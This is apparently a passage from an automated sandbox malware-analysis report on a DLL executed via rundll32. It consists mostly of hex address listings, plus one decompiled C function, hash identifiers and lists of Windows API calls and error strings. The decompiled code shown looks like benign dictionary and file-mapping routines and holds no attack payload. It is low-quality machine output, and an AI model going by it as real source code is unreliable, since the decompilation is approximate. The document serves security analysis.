                                                                      0x10041394
                                                                      0x10041398
                                                                      0x1004139a
                                                                      0x1004139c
                                                                      0x1004139c
                                                                      0x1004136b
                                                                      0x10041294
                                                                      0x1004129b
                                                                      0x10041330
                                                                      0x10041333
                                                                      0x10041337
                                                                      0x10041341
                                                                      0x00000000
                                                                      0x10041347
                                                                      0x100412a1
                                                                      0x100412a6
                                                                      0x10041320
                                                                      0x10041320
                                                                      0x10041324
                                                                      0x10041324
                                                                      0x100412a6
                                                                      0x100412a8
                                                                      0x100412ac
                                                                      0x100412af
                                                                      0x100412b3
                                                                      0x100412b6
                                                                      0x100412b9
                                                                      0x100412c0
                                                                      0x100412c4
                                                                      0x100412c6
                                                                      0x100412ca
                                                                      0x100412cd
                                                                      0x100412d0
                                                                      0x100412d4
                                                                      0x100412da
                                                                      0x100413d0
                                                                      0x100412e0
                                                                      0x100412e0
                                                                      0x100412e4
                                                                      0x100412e8
                                                                      0x100412ec
                                                                      0x100412ee
                                                                      0x100412f0
                                                                      0x100412f0
                                                                      0x100412f4
                                                                      0x100412f7
                                                                      0x100412fa
                                                                      0x100412fd
                                                                      0x10041301
                                                                      0x10041305
                                                                      0x10041309
                                                                      0x1004130e
                                                                      0x1004130e
                                                                      0x100412da
                                                                      0x100411f7
                                                                      0x100411fb
                                                                      0x10041201
                                                                      0x1004124b
                                                                      0x100413c0
                                                                      0x100413c3
                                                                      0x100413c4
                                                                      0x100413c5
                                                                      0x100413c6
                                                                      0x100413c6
                                                                      0x10041254
                                                                      0x100413a8
                                                                      0x100413ab
                                                                      0x100413ae
                                                                      0x100413b1
                                                                      0x100413b4
                                                                      0x100413b4
                                                                      0x1004125d
                                                                      0x1004125f
                                                                      0x10041261
                                                                      0x10041263
                                                                      0x10041266
                                                                      0x10041266
                                                                      0x10041269
                                                                      0x1004126c
                                                                      0x1004126f
                                                                      0x10041273
                                                                      0x10041275
                                                                      0x10041275
                                                                      0x1004125d
                                                                      0x10041203
                                                                      0x10041208
                                                                      0x10041230
                                                                      0x10041236
                                                                      0x1004123b
                                                                      0x1004123e
                                                                      0x00000000
                                                                      0x10041240
                                                                      0x00000000
                                                                      0x10041240
                                                                      0x1004120a
                                                                      0x1004120d
                                                                      0x10041220
                                                                      0x10041220
                                                                      0x10041224
                                                                      0x10041227
                                                                      0x1004122a
                                                                      0x1004122b
                                                                      0x1004122c
                                                                      0x1004122d
                                                                      0x1004122e
                                                                      0x1004120f
                                                                      0x1004120f
                                                                      0x1004120f
                                                                      0x10041212
                                                                      0x10041213
                                                                      0x10041214
                                                                      0x10041215
                                                                      0x10041216
                                                                      0x10041216
                                                                      0x1004120d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001ca60
                                                                      0x1001ca64
                                                                      0x1001ca68
                                                                      0x1001ca6a
                                                                      0x1001ca6e
                                                                      0x1001ca72
                                                                      0x1004c280
                                                                      0x1004c281
                                                                      0x1004c283
                                                                      0x1004c284
                                                                      0x1004c285
                                                                      0x1004c28a
                                                                      0x1004c28b
                                                                      0x1004c28e
                                                                      0x1004c292
                                                                      0x1004c296
                                                                      0x1004c299
                                                                      0x1004c29b
                                                                      0x1004c29e
                                                                      0x1004c2a1
                                                                      0x1004c2a4
                                                                      0x1004c2a6
                                                                      0x1004c2a9
                                                                      0x1004c2ae
                                                                      0x1004c2b1
                                                                      0x1004c340
                                                                      0x1004c344
                                                                      0x1004c34a
                                                                      0x1004c34d
                                                                      0x1004c406
                                                                      0x1004c4a0
                                                                      0x1004c4a3
                                                                      0x1004c4a4
                                                                      0x1004c4a7
                                                                      0x1004c4ab
                                                                      0x1004c4ae
                                                                      0x1004c4b1
                                                                      0x1004c4b1
                                                                      0x1004c412
                                                                      0x1004c48a
                                                                      0x1004c48d
                                                                      0x1004c490
                                                                      0x1004c493
                                                                      0x1004c497
                                                                      0x1004c497
                                                                      0x1004c414
                                                                      0x1004c41a
                                                                      0x1004c420
                                                                      0x1004c427
                                                                      0x1004c42b
                                                                      0x1004c42d
                                                                      0x1004c431
                                                                      0x1004c435
                                                                      0x1004c435
                                                                      0x1004c438
                                                                      0x1004c43c
                                                                      0x1004c43f
                                                                      0x1004c443
                                                                      0x1004c447
                                                                      0x1004c449
                                                                      0x1004c44b
                                                                      0x1004c44b
                                                                      0x1004c41a
                                                                      0x1004c353
                                                                      0x1004c359
                                                                      0x1004c3e8
                                                                      0x1004c3eb
                                                                      0x1004c3ef
                                                                      0x1004c3f8
                                                                      0x00000000
                                                                      0x1004c3fe
                                                                      0x1004c35f
                                                                      0x1004c363
                                                                      0x1004c3d8
                                                                      0x1004c3d8
                                                                      0x1004c3dc
                                                                      0x1004c3dc
                                                                      0x1004c363
                                                                      0x1004c365
                                                                      0x1004c368
                                                                      0x1004c36e
                                                                      0x1004c373
                                                                      0x1004c378
                                                                      0x1004c37b
                                                                      0x1004c37f
                                                                      0x1004c383
                                                                      0x1004c387
                                                                      0x1004c389
                                                                      0x1004c38c
                                                                      0x1004c38f
                                                                      0x1004c395
                                                                      0x1004c480
                                                                      0x1004c39b
                                                                      0x1004c39b
                                                                      0x1004c39f
                                                                      0x1004c3a3
                                                                      0x1004c3a6
                                                                      0x1004c3a8
                                                                      0x1004c3b0
                                                                      0x1004c3b0
                                                                      0x1004c3b4
                                                                      0x1004c3b9
                                                                      0x1004c3bc
                                                                      0x1004c3c0
                                                                      0x1004c3c3
                                                                      0x1004c3c8
                                                                      0x1004c3cc
                                                                      0x1004c3cc
                                                                      0x1004c395
                                                                      0x1004c2b7
                                                                      0x1004c2bd
                                                                      0x1004c2c1
                                                                      0x1004c30b
                                                                      0x1004c470
                                                                      0x1004c473
                                                                      0x1004c474
                                                                      0x1004c475
                                                                      0x1004c476
                                                                      0x1004c476
                                                                      0x1004c314
                                                                      0x1004c458
                                                                      0x1004c45b
                                                                      0x1004c45e
                                                                      0x1004c461
                                                                      0x1004c464
                                                                      0x1004c464
                                                                      0x1004c31d
                                                                      0x1004c31f
                                                                      0x1004c321
                                                                      0x1004c323
                                                                      0x1004c326
                                                                      0x1004c326
                                                                      0x1004c329
                                                                      0x1004c32c
                                                                      0x1004c32f
                                                                      0x1004c333
                                                                      0x1004c335
                                                                      0x1004c335
                                                                      0x1004c31d
                                                                      0x1004c2c3
                                                                      0x1004c2c8
                                                                      0x1004c2f0
                                                                      0x1004c2f6
                                                                      0x1004c2fb
                                                                      0x1004c2fe
                                                                      0x00000000
                                                                      0x1004c300
                                                                      0x00000000
                                                                      0x1004c300
                                                                      0x1004c2ca
                                                                      0x1004c2cd
                                                                      0x1004c2e0
                                                                      0x1004c2e0
                                                                      0x1004c2e4
                                                                      0x1004c2e7
                                                                      0x1004c2ea
                                                                      0x1004c2eb
                                                                      0x1004c2ec
                                                                      0x1004c2ed
                                                                      0x1004c2ee
                                                                      0x1004c2cf
                                                                      0x1004c2cf
                                                                      0x1004c2cf
                                                                      0x1004c2d2
                                                                      0x1004c2d3
                                                                      0x1004c2d4
                                                                      0x1004c2d5
                                                                      0x1004c2d6
                                                                      0x1004c2d6
                                                                      0x1004c2cd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001cac0
                                                                      0x1001cac4
                                                                      0x1001cac8
                                                                      0x1001cacb
                                                                      0x1001cacf
                                                                      0x1001cad2
                                                                      0x1001cad5
                                                                      0x1001cada
                                                                      0x1001cadd
                                                                      0x1001cae1
                                                                      0x1001cae4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001ca38
                                                                      0x1001ca3c
                                                                      0x1001ca40
                                                                      0x1004144e
                                                                      0x10041452
                                                                      0x10041456
                                                                      0x1004145b
                                                                      0x1004145e
                                                                      0x10041463
                                                                      0x1004146c
                                                                      0x10041488
                                                                      0x10041488
                                                                      0x1004148a
                                                                      0x10041490
                                                                      0x10041493
                                                                      0x10041499
                                                                      0x1004149c
                                                                      0x10041470
                                                                      0x1004149e
                                                                      0x1004149e
                                                                      0x100414a2
                                                                      0x100414a5
                                                                      0x100414a9
                                                                      0x100414ac
                                                                      0x100414ac
                                                                      0x10041475
                                                                      0x10041478
                                                                      0x1004147d
                                                                      0x10041483
                                                                      0x00000000
                                                                      0x1004146e
                                                                      0x100414b8
                                                                      0x100414bb
                                                                      0x100414c0
                                                                      0x100414c4
                                                                      0x100414c8
                                                                      0x100414cc
                                                                      0x100414d4
                                                                      0x100414d6
                                                                      0x100414d9
                                                                      0x100414db
                                                                      0x100414e0
                                                                      0x100414e2
                                                                      0x100414e5
                                                                      0x100414e7
                                                                      0x100414ed
                                                                      0x100414ef
                                                                      0x100414f2
                                                                      0x100414f4
                                                                      0x100414fa
                                                                      0x100414fc
                                                                      0x100414ff
                                                                      0x10041501
                                                                      0x10041507
                                                                      0x10041509
                                                                      0x1004150c
                                                                      0x1004150e
                                                                      0x10041514
                                                                      0x10041516
                                                                      0x10041519
                                                                      0x1004151b
                                                                      0x10041521
                                                                      0x10041523
                                                                      0x10041526
                                                                      0x10041528
                                                                      0x1004152e
                                                                      0x10041530
                                                                      0x10041533
                                                                      0x10041535
                                                                      0x1004153b
                                                                      0x1004153d
                                                                      0x10041540
                                                                      0x10041542
                                                                      0x10041542
                                                                      0x1004153b
                                                                      0x1004152e
                                                                      0x10041521
                                                                      0x10041514
                                                                      0x10041507
                                                                      0x100414fa
                                                                      0x100414ed
                                                                      0x100414e0
                                                                      0x10041545
                                                                      0x10041548
                                                                      0x10041549
                                                                      0x1004154a
                                                                      0x1004154b
                                                                      0x1004154c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001cb60
                                                                      0x1001cb66
                                                                      0x1004c4c0
                                                                      0x1004c4c1
                                                                      0x1004c4c3
                                                                      0x1004c4c4
                                                                      0x1004c4c6
                                                                      0x1004c4c7
                                                                      0x1004c4c8
                                                                      0x1004c4cb
                                                                      0x1004c4cf
                                                                      0x1004c4d3
                                                                      0x1004c4d7
                                                                      0x1004c4da
                                                                      0x1004c4df
                                                                      0x1004c4e2
                                                                      0x1004c4e4
                                                                      0x1004c4e8
                                                                      0x1004c4ea
                                                                      0x1004c4ec
                                                                      0x1004c4f0
                                                                      0x1004c4f2
                                                                      0x1004c4f8
                                                                      0x1004c4fb
                                                                      0x1004c4fe
                                                                      0x1004c500
                                                                      0x1004c502
                                                                      0x1004c508
                                                                      0x1004c50c
                                                                      0x1004c830
                                                                      0x1004c837
                                                                      0x1004c83a
                                                                      0x1004c845
                                                                      0x1004c84a
                                                                      0x1004c84f
                                                                      0x1004c512
                                                                      0x1004c512
                                                                      0x1004c515
                                                                      0x1004c51a
                                                                      0x1004c51a
                                                                      0x1004c51f
                                                                      0x1004c523
                                                                      0x1004c525
                                                                      0x1004c527
                                                                      0x1004c529
                                                                      0x1004c529
                                                                      0x1004c52d
                                                                      0x1004c530
                                                                      0x1004c531
                                                                      0x1004c535
                                                                      0x1004c535
                                                                      0x1004c537
                                                                      0x1004c53a
                                                                      0x1004c53f
                                                                      0x1004c548
                                                                      0x1004c54a
                                                                      0x1004c568
                                                                      0x1004c568
                                                                      0x1004c568
                                                                      0x1004c56a
                                                                      0x1004c56d
                                                                      0x1004c570
                                                                      0x1004c573
                                                                      0x1004c579
                                                                      0x1004c57c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1004c550
                                                                      0x1004c555
                                                                      0x1004c558
                                                                      0x1004c55d
                                                                      0x1004c566
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1004c566
                                                                      0x1004c57e
                                                                      0x1004c585
                                                                      0x1004c58b
                                                                      0x1004c592
                                                                      0x1004c597
                                                                      0x1004c59a
                                                                      0x1004c59d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1004c59d
                                                                      0x1004c59f
                                                                      0x1004c59f
                                                                      0x1004c5a1
                                                                      0x1004c5a7
                                                                      0x1004c5aa
                                                                      0x1004c5af
                                                                      0x1004c5b2
                                                                      0x1004c5b5
                                                                      0x1004c5b8
                                                                      0x1004c5bd
                                                                      0x1004c7f0
                                                                      0x1004c7f5
                                                                      0x1004c7f9
                                                                      0x1004c7fb
                                                                      0x1004c896
                                                                      0x1004c9b5
                                                                      0x1004c9ba
                                                                      0x1004c9be
                                                                      0x1004c9bf
                                                                      0x1004c9bf
                                                                      0x1004c9c2
                                                                      0x1004c9c2
                                                                      0x1004c8a0
                                                                      0x1004c98b
                                                                      0x1004c98e
                                                                      0x1004c991
                                                                      0x1004c994
                                                                      0x1004c997
                                                                      0x1004c997
                                                                      0x1004c8a9
                                                                      0x1004c8af
                                                                      0x1004c8b3
                                                                      0x1004c8b5
                                                                      0x1004c8b9
                                                                      0x1004c8bc
                                                                      0x1004c8bf
                                                                      0x1004c8c1
                                                                      0x1004c8c4
                                                                      0x1004c8c4
                                                                      0x1004c8c7
                                                                      0x1004c8ca
                                                                      0x1004c8cd
                                                                      0x1004c8d1
                                                                      0x1004c8d5
                                                                      0x1004c8d7
                                                                      0x1004c8d9
                                                                      0x1004c8d9
                                                                      0x1004c8a9
                                                                      0x1004c801
                                                                      0x1004c809
                                                                      0x1004c85f
                                                                      0x1004c862
                                                                      0x1004c865
                                                                      0x1004c868
                                                                      0x1004c86d
                                                                      0x00000000
                                                                      0x1004c86f
                                                                      0x1004c80b
                                                                      0x1004c80e
                                                                      0x1004c856
                                                                      0x1004c856
                                                                      0x1004c85a
                                                                      0x1004c85a
                                                                      0x1004c80e
                                                                      0x1004c810
                                                                      0x1004c813
                                                                      0x1004c81c
                                                                      0x1004c821
                                                                      0x1004c821
                                                                      0x1004c824
                                                                      0x1004c829
                                                                      0x1004c5c3
                                                                      0x1004c5c3
                                                                      0x1004c5c7
                                                                      0x1004c5c7
                                                                      0x1004c5cc
                                                                      0x1004c5d2
                                                                      0x1004c723
                                                                      0x1004c945
                                                                      0x1004c948
                                                                      0x1004c949
                                                                      0x1004c94a
                                                                      0x1004c94b
                                                                      0x1004c94b
                                                                      0x1004c730
                                                                      0x1004c953
                                                                      0x1004c956
                                                                      0x1004c959
                                                                      0x1004c95c
                                                                      0x1004c95f
                                                                      0x1004c95f
                                                                      0x1004c739
                                                                      0x1004c73f
                                                                      0x1004c741
                                                                      0x1004c743
                                                                      0x1004c746
                                                                      0x1004c746
                                                                      0x1004c749
                                                                      0x1004c74c
                                                                      0x1004c74f
                                                                      0x1004c753
                                                                      0x1004c755
                                                                      0x1004c755
                                                                      0x1004c739
                                                                      0x1004c5d8
                                                                      0x1004c5e0
                                                                      0x1004c708
                                                                      0x1004c70b
                                                                      0x1004c70e
                                                                      0x1004c711
                                                                      0x1004c716
                                                                      0x00000000
                                                                      0x1004c71c
                                                                      0x00000000
                                                                      0x1004c71c
                                                                      0x1004c6be
                                                                      0x1004c6be
                                                                      0x1004c6c1
                                                                      0x1004c6c2
                                                                      0x1004c6c3
                                                                      0x1004c6c4
                                                                      0x1004c6c5
                                                                      0x00000000
                                                                      0x1004c5e6
                                                                      0x1004c5e9
                                                                      0x1004c6f8
                                                                      0x1004c6f8
                                                                      0x1004c6fc
                                                                      0x1004c6fc
                                                                      0x1004c5e9
                                                                      0x1004c5ef
                                                                      0x1004c5ef
                                                                      0x1004c5f2
                                                                      0x1004c5f7
                                                                      0x1004c5fa
                                                                      0x1004c5fc
                                                                      0x1004c602
                                                                      0x1004c605
                                                                      0x1004c608
                                                                      0x1004c610
                                                                      0x1004c7a3
                                                                      0x1004c7a5
                                                                      0x1004c7a9
                                                                      0x1004c7ad
                                                                      0x1004c8e5
                                                                      0x1004c976
                                                                      0x1004c97b
                                                                      0x1004c97f
                                                                      0x1004c980
                                                                      0x1004c980
                                                                      0x1004c983
                                                                      0x1004c983
                                                                      0x1004c8ee
                                                                      0x1004c9a0
                                                                      0x1004c9a3
                                                                      0x1004c9a6
                                                                      0x1004c9a9
                                                                      0x1004c9ac
                                                                      0x1004c9ac
                                                                      0x1004c8f7
                                                                      0x1004c8fd
                                                                      0x1004c901
                                                                      0x1004c903
                                                                      0x1004c907
                                                                      0x1004c90a
                                                                      0x1004c90d
                                                                      0x1004c90f
                                                                      0x1004c912
                                                                      0x1004c912
                                                                      0x1004c915
                                                                      0x1004c918
                                                                      0x1004c91b
                                                                      0x1004c91f
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_malloczmv_strcasecmp
                                                                      • String ID: MD5
                                                                      • API String ID: 1451953452-1168476579
                                                                      • Opcode ID: 05d541b0a02844c6fa927b2182f2bf38f1bce2312da876daaceceafae4a04c82
                                                                      • Instruction ID: 67cf48b984792008eb9918d7ca6f9d2bd109b0f8cd42104998243e9ea9d1147f
                                                                      • Opcode Fuzzy Hash: 05d541b0a02844c6fa927b2182f2bf38f1bce2312da876daaceceafae4a04c82
                                                                      • Instruction Fuzzy Hash: 2691D2B8909704DFC750DF68C58091ABBE0FF89354F14896EF9888B361E734D981EB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 17%
                                                                      			E10011560(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int* _a4, signed int* _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				char _v50;
                                                                      				void* _v56;
                                                                      				void* _v60;
                                                                      				void* _v64;
                                                                      				intOrPtr _v92;
                                                                      				signed int _v96;
                                                                      				signed int* _v100;
                                                                      				signed int* _v104;
                                                                      				signed int* _t89;
                                                                      				signed int* _t98;
                                                                      				signed int* _t99;
                                                                      				signed int _t104;
                                                                      				void* _t105;
                                                                      				int _t109;
                                                                      				int _t110;
                                                                      				void* _t112;
                                                                      				signed int _t116;
                                                                      				signed int* _t121;
                                                                      				signed int _t127;
                                                                      				int _t129;
                                                                      				signed int _t130;
                                                                      				intOrPtr* _t133;
                                                                      				signed int* _t134;
                                                                      				void* _t136;
                                                                      				signed int* _t140;
                                                                      				signed int* _t142;
                                                                      				int _t143;
                                                                      				void* _t144;
                                                                      				signed int* _t149;
                                                                      				void* _t150;
                                                                      				signed int* _t152;
                                                                      				signed int _t153;
                                                                      				int _t155;
                                                                      				signed int _t156;
                                                                      				void _t158;
                                                                      				signed int** _t162;
                                                                      				signed int** _t163;
                                                                      
                                                                      				_v16 = __ebx;
                                                                      				_v12 = __esi;
                                                                      				_v104 = 0x16;
                                                                      				_t149 =  &_v50;
                                                                      				 *_t163 = _t149;
                                                                      				_v92 = _a16;
                                                                      				_v96 = _a12;
                                                                      				_v100 = 0x100b4200;
                                                                      				_v8 = __edi;
                                                                      				_t140 = _a8;
                                                                      				_v4 = __ebp;
                                                                      				E10011040();
                                                                      				_v60 = 0;
                                                                      				_t121 =  *_a4;
                                                                      				 *_t163 = _t149;
                                                                      				_v56 = 0;
                                                                      				_t89 = E100292E0(_t121, _t140, _t149, 0);
                                                                      				_v56 = _t89;
                                                                      				if(_t140 == 0) {
                                                                      					_t150 = 0xffffffea;
                                                                      					L24:
                                                                      					if(_t121 == 0) {
                                                                      						L16:
                                                                      						 *_t163 = _v60;
                                                                      						L100290D0();
                                                                      						 *_t163 = _v56;
                                                                      						L100290D0();
                                                                      						L17:
                                                                      						return _t150;
                                                                      					}
                                                                      					L15:
                                                                      					if( *_t121 == 0) {
                                                                      						 *_t163 =  &(_t121[1]);
                                                                      						E100290E0();
                                                                      						 *_t163 = _a4;
                                                                      						E100290E0();
                                                                      					}
                                                                      					goto L16;
                                                                      				}
                                                                      				_t162 = 0;
                                                                      				_t152 = _t89;
                                                                      				if((_a20 & 0x00000040) == 0) {
                                                                      					_v104 = _t140;
                                                                      					_v100 = 0;
                                                                      					 *_t163 = _t121;
                                                                      					_v96 = _a20 & 0xfffffff7;
                                                                      					_t162 = E100110D0();
                                                                      				}
                                                                      				if((_a20 & 0x00000004) == 0) {
                                                                      					 *_t163 = _t140;
                                                                      					_t98 = E100292E0(_t121, _t140, _t152, _t162);
                                                                      					_v60 = _t98;
                                                                      					_t142 = _t98;
                                                                      					if(_t121 == 0) {
                                                                      						L19:
                                                                      						 *_t163 = 8;
                                                                      						_t99 = E10029100();
                                                                      						_t142 = _v60;
                                                                      						_t121 = _t99;
                                                                      						 *_a4 = _t121;
                                                                      						if(_t121 == 0 || _t142 == 0) {
                                                                      							_t150 = 0xfffffff4;
                                                                      							goto L24;
                                                                      						} else {
                                                                      							L21:
                                                                      							_t152 = _v56;
                                                                      							L4:
                                                                      							if(_t152 == 0) {
                                                                      								L14:
                                                                      								_t150 = 0xfffffff4;
                                                                      								goto L15;
                                                                      							}
                                                                      							if(_t162 == 0) {
                                                                      								_v100 = 8;
                                                                      								_v104 =  *_t121 + 1;
                                                                      								 *_t163 = _t121[1];
                                                                      								_t104 = E10029010();
                                                                      								_t153 = _t104;
                                                                      								if(_t104 == 0) {
                                                                      									goto L14;
                                                                      								}
                                                                      								_t121[1] = _t104;
                                                                      								_t127 =  *_t121;
                                                                      								L10:
                                                                      								_t105 = _v56;
                                                                      								if(_t105 == 0) {
                                                                      									if(_t127 == 0) {
                                                                      										 *_t163 =  &(_t121[1]);
                                                                      										E100290E0();
                                                                      										 *_t163 = _a4;
                                                                      										E100290E0();
                                                                      									}
                                                                      									_t150 = 0;
                                                                      									 *_t163 =  &_v60;
                                                                      									E100290E0();
                                                                      								} else {
                                                                      									_t133 = _t153 + _t127 * 8;
                                                                      									 *((intOrPtr*)(_t133 + 4)) = _t105;
                                                                      									 *_t133 = _v60;
                                                                      									_t150 = 0;
                                                                      									 *_t121 = _t127 + 1;
                                                                      								}
                                                                      								goto L17;
                                                                      							}
                                                                      							if((_a20 & 0x00000010) != 0) {
                                                                      								 *_t163 = _t142;
                                                                      								_t150 = 0;
                                                                      								L100290D0();
                                                                      								 *_t163 = _v56;
                                                                      								L100290D0();
                                                                      								goto L17;
                                                                      							}
                                                                      							_t134 = _a4;
                                                                      							 *_t163 = _t134;
                                                                      							if((_a20 & 0x00000020) != 0) {
                                                                      								_v64 = _t134;
                                                                      								_t109 = strlen(??);
                                                                      								 *_t163 = _t152;
                                                                      								_t143 = _t109;
                                                                      								_t110 = strlen(??);
                                                                      								 *_t163 = _v64;
                                                                      								_t155 = _t110;
                                                                      								_t68 = _t110 + 1; // 0x1
                                                                      								_v104 = _t143 + _t68;
                                                                      								_t112 = L10028DA0();
                                                                      								if(_t112 == 0) {
                                                                      									goto L14;
                                                                      								}
                                                                      								_t70 = _t155 + 1; // 0x1
                                                                      								_t129 = _t70;
                                                                      								_t144 = _t143 + _t112;
                                                                      								_t136 = _v56;
                                                                      								if(_t129 >= 8) {
                                                                      									if((_t144 & 0x00000001) != 0) {
                                                                      										_t130 =  *_t136 & 0x000000ff;
                                                                      										_t144 = _t144 + 1;
                                                                      										_t136 = _t136 + 1;
                                                                      										 *(_t144 - 1) = _t130;
                                                                      										_t129 = _t155;
                                                                      									}
                                                                      									if((_t144 & 0x00000002) != 0) {
                                                                      										_t156 =  *_t136 & 0x0000ffff;
                                                                      										_t144 = _t144 + 2;
                                                                      										_t136 = _t136 + 2;
                                                                      										_t129 = _t129 - 2;
                                                                      										 *(_t144 - 2) = _t156;
                                                                      									}
                                                                      									if((_t144 & 0x00000004) != 0) {
                                                                      										_t158 =  *_t136;
                                                                      										_t144 = _t144 + 4;
                                                                      										_t136 = _t136 + 4;
                                                                      										_t129 = _t129 - 4;
                                                                      										 *(_t144 - 4) = _t158;
                                                                      									}
                                                                      								}
                                                                      								_v64 = _t112;
                                                                      								memcpy(_t144, _t136, _t129);
                                                                      								_t163 =  &(_t163[3]);
                                                                      								 *_t163 =  &_v56;
                                                                      								E100290E0();
                                                                      								_v56 = _v64;
                                                                      								goto L9;
                                                                      							} else {
                                                                      								L100290D0();
                                                                      								L9:
                                                                      								 *_t163 =  *_t162;
                                                                      								L100290D0();
                                                                      								_t116 =  *_t121;
                                                                      								_t153 = _t121[1];
                                                                      								_t32 = _t116 - 1; // -1
                                                                      								_t127 = _t32;
                                                                      								 *_t121 = _t127;
                                                                      								 *_t162 =  *(_t153 + _t127 * 8);
                                                                      								_a4 =  *(_t153 + 4 + _t127 * 8);
                                                                      								goto L10;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					if(_t98 != 0) {
                                                                      						goto L21;
                                                                      					}
                                                                      					goto L14;
                                                                      				}
                                                                      				_v60 = _t140;
                                                                      				if(_t121 == 0) {
                                                                      					goto L19;
                                                                      				}
                                                                      				goto L4;
                                                                      			}












































                                                                      0x00000000
                                                                      0x10011629
                                                                      0x10011629
                                                                      0x1001162e
                                                                      0x10011631
                                                                      0x10011634
                                                                      0x10011639
                                                                      0x1001163b
                                                                      0x1001163e
                                                                      0x1001163e
                                                                      0x10011641
                                                                      0x1001164a
                                                                      0x1001164d
                                                                      0x00000000
                                                                      0x1001164d
                                                                      0x10011623
                                                                      0x1001171a
                                                                      0x10011684
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10011684
                                                                      0x100115eb
                                                                      0x100115f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strlen$mv_freepmv_strdup$_aligned_reallocmv_dict_getmv_malloczmv_reallocmv_realloc_array
                                                                      • String ID: $%lld
                                                                      • API String ID: 420417855-3617178099
                                                                      • Opcode ID: c3b2448d299c3e7ec0f0b399289f88982a6b045d30e820103abfaa4dec61d1d3
                                                                      • Instruction ID: 8f6e5ec8c3f0a619e422cb1a926671cc568e29337de09296a572835a12694a18
                                                                      • Opcode Fuzzy Hash: c3b2448d299c3e7ec0f0b399289f88982a6b045d30e820103abfaa4dec61d1d3
                                                                      • Instruction Fuzzy Hash: 539117B59097458FC754DF68C18066EBBE0FF88380F56892DED889B341DB74E880CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mvpriv_open.F072 ref: 1001933F
                                                                        • Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10019633
                                                                        • Part of subcall function 100195E0: mv_calloc.F072 ref: 1001964E
                                                                        • Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32 ref: 10019685
                                                                        • Part of subcall function 100195E0: mv_calloc.F072 ref: 100196D7
                                                                        • Part of subcall function 100195E0: mv_freep.F072 ref: 10019713
                                                                        • Part of subcall function 100195E0: wcslen.MSVCRT ref: 1001971F
                                                                        • Part of subcall function 100195E0: _wsopen.MSVCRT ref: 1001974B
                                                                      • _fstat64.MSVCRT ref: 10019366
                                                                      • _close.MSVCRT ref: 10019394
                                                                      • _get_osfhandle.MSVCRT ref: 100193C5
                                                                      • CreateFileMappingA.KERNEL32 ref: 100193ED
                                                                      • MapViewOfFile.KERNEL32 ref: 10019422
                                                                      • CloseHandle.KERNEL32 ref: 10019434
                                                                      • mv_log.F072 ref: 1001945D
                                                                      • _close.MSVCRT ref: 10019465
                                                                      • _errno.MSVCRT ref: 10019480
                                                                      • mv_strerror.F072 ref: 100194A1
                                                                      • mv_log.F072 ref: 100194C7
                                                                      • _errno.MSVCRT ref: 100194D8
                                                                      • mv_strerror.F072 ref: 100194FE
                                                                      • mv_log.F072 ref: 1001951B
                                                                      • _close.MSVCRT ref: 10019523
                                                                      • mv_log.F072 ref: 1001954F
                                                                      • _close.MSVCRT ref: 10019557
                                                                      Strings
                                                                      • Error occurred in CreateFileMapping(), xrefs: 10019561
                                                                      • File size for file '%s' is too big, xrefs: 10019535
